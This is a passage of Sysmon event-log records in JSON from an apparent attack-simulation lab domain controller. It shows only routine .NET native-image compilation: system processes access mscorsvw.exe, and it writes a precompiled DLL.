{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001076EC1100}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001076EC1100}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.451\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001076EC1100}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.451","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001076EC1100}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.529\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00102DF01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.529","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00102DF01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00102DF01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00102DF01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00102DF01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00102DF01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:40.747\r\nProcessGuid: {E2A3D6B1-13CC-5F25-0000-00102DF01100}\r\nProcessId: 5016\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1398-0\\System.Xml.Linq.dll\r\nCreationUtcTime: 2020-08-01 07:03:40.747","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:40.747","ProcessGuid":"{E2A3D6B1-13CC-5F25-0000-00102DF01100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1398-0\\System.Xml.Linq.dll","CreationUtcTime":"2020-08-01 07:03:40.747","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.794\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001030F41100}\r\nTargetProcessId: 5012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.794","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001030F41100}","TargetProcessId":"5012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001030F41100}\r\nTargetProcessId: 5012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001030F41100}","TargetProcessId":"5012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001030F41100}\r\nTargetProcessId: 5012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001030F41100}","TargetProcessId":"5012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4